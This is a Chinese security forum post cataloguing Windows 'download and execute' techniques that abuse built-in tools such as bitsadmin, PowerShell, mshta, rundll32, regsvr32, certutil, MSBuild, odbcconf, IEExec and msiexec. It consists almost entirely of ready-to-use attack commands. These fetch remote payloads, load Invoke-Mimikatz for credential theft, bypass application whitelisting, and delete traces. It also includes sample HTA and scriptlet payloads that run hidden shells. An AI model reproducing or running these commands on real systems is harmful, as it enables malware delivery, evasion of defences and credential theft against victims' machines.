设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 Windows下载执行命令大全
返回列表 发新帖
查看: 2415|回复: 0

Windows下载执行命令大全

[复制链接]
gclome

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2021-4-28 16:43:42 | 显示全部楼层 |阅读模式
原文链接:Windows下载执行命令大全

1.bitsadmin命令(只能命令下载到指定路径上,win7以上):
  1. bitsadmin /transfer myDownLoadJob /download /priority normal "http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg" "d:\abc.jpg"
复制代码
  1. bitsadmin /transfer d90f <http://site.com/a> %APPDATA%\d90f.exe&%APPDATA%\d90f.exe&del %APPDATA%\d90f.exe
复制代码

2.powershell命名下载执行:(win7以上)

  1. powershell IEX (New-Object Net.WebClient).DownloadString('<https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1>'); Invoke-Mimikatz
复制代码
  1. powershell -exec bypass -f \\webdavserver\folder\payload.ps1
复制代码
  1. powershell (new-object System.Net.WebClient).DownloadFile( 'http://192.168.168.183/1.exe’,’C:\111111111111111.exe')
复制代码
  1. powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg','d:\\1.jpg')
复制代码

3.mshta命令下载执行
  1. mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

  3. mshta http://webserver/payload.hta

  5. mshta \\webdavserver\folder\payload.hta
复制代码

payload.hta

  1. <HTML>

  3. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">

  5. <HEAD>

  7. <script language="VBScript">

  9. Window.ReSizeTo 0, 0

  11. Window.moveTo -2000,-2000

  13. Set objShell = CreateObject("Wscript.Shell")

  15. objShell.Run "calc.exe"

  17. self.close

  19. </script>

  21. <body>

  23. demo

  25. </body>

  27. </HEAD>

  29. </HTML>
复制代码

4.rundll32命令下载执行
  1. rundll32 \\webdavserver\folder\payload.dll,entrypoint


  4. rundll32.exe  javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
复制代码

参考:https://github.com/3gstudent/Javascript-Backdoor

5.net中的regasm命令下载执行
  1. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
复制代码

6.cmd的远程命令下载:cmd.exe /k < \webdavserver\folder\batchfile.txt

7.regsvr32命令下载执行

  1. regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll

  3. regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

  5. regsvr32 /u /s /i:<http://site.com/js.png> scrobj.dll
复制代码

js.png
  1. <?XML version="1.0"?>

  3. <scriptlet>

  5. <registration

  7. ​    progid="ShortJSRAT"

  9. ​    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >

  11. ​    <!-- Learn from Casey Smith @subTee -->

  13. ​    <script language="JScript">

  15. ​        <![CDATA[

  17. ​            ps  = "cmd.exe /c calc.exe";

  19. ​            new ActiveXObject("WScript.Shell").Run(ps,0,true);



  23. ​        ]]>

  25. </script>

  27. </registration>

  29. </scriptlet>
复制代码

8.certutil命令下载执行
  1. certutil -urlcache -split -f http://webserver/payload payload

  3. certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll


  6. certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe


  9. certutil -urlcache -split -f http://site.com/a a.exe && a.exe &&  del a.exe && certutil -urlcache -split -f http://192.168.254.102:80/a delete
复制代码

9.net中的MSBulid命令下载执行
  1. cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
复制代码

10. odbcconf命令下载执行
  1. odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
复制代码

11.cscript脚本远程命令下载执行
  1. cscript //E:jscript \\webdavserver\folder\payload.txt
复制代码

downfile.vbs:
  1. ' Set your settings

  3. strFileURL = "http://www.it1.net/images/it1_logo2.jpg"

  5. strHDLocation = "c:\logo.jpg"



  9. ' Fetch the file

  11. Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")



  15. objXMLHTTP.open "GET", strFileURL, false

  17. objXMLHTTP.send()



  21. If objXMLHTTP.Status = 200 Then

  23. Set objADOStream = CreateObject("ADODB.Stream")

  25. objADOStream.Open

  27. objADOStream.Type = 1 'adTypeBinary



  31. objADOStream.Write objXMLHTTP.ResponseBody

  33. objADOStream.Position = 0'Set the stream position to the start



  37. Set objFSO = Createobject("Scripting.FileSystemObject")

  39. If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation

  41. Set objFSO = Nothing



  45. objADOStream.SaveToFile strHDLocation

  47. objADOStream.Close

  49. Set objADOStream = Nothing

  51. End if

  53. Set objXMLHTTP = Nothing
复制代码

将以上保存为downfile.vbs
输入命令:cscript  downfile.vbs

12.pubprn.vbs下载执行命令
  1. cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:<https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct>
复制代码

13.windows自带命令copycopy \x.x.x.x\xx\poc.exe
xcopy d:\test.exe  \x.x.x.x\test.exe

14. IEXPLORE.EXE命令下载执行(需要IE存在oday)

  1. "C:\Program Files\Internet Explorer\IEXPLORE.EXE" <http://site.com/exp>
复制代码

15.IEEXC命令下载执行
  1. C:\Windows\Microsoft.NET\Framework\v2.0.50727\> caspol -s off

  3. C:\Windows\Microsoft.NET\Framework\v2.0.50727\> IEExec <http://site.com/files/test64.exe>
复制代码

参考:https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/

16. msiexec命令下载执行
  1. msiexec /q /i <http://site.com/payloads/calc.png>
复制代码

17.下载命令执行项目GreatSCT

  1. <https://github.com/GreatSCT/>
复制代码













回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 02:44 , Processed in 0.013909 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表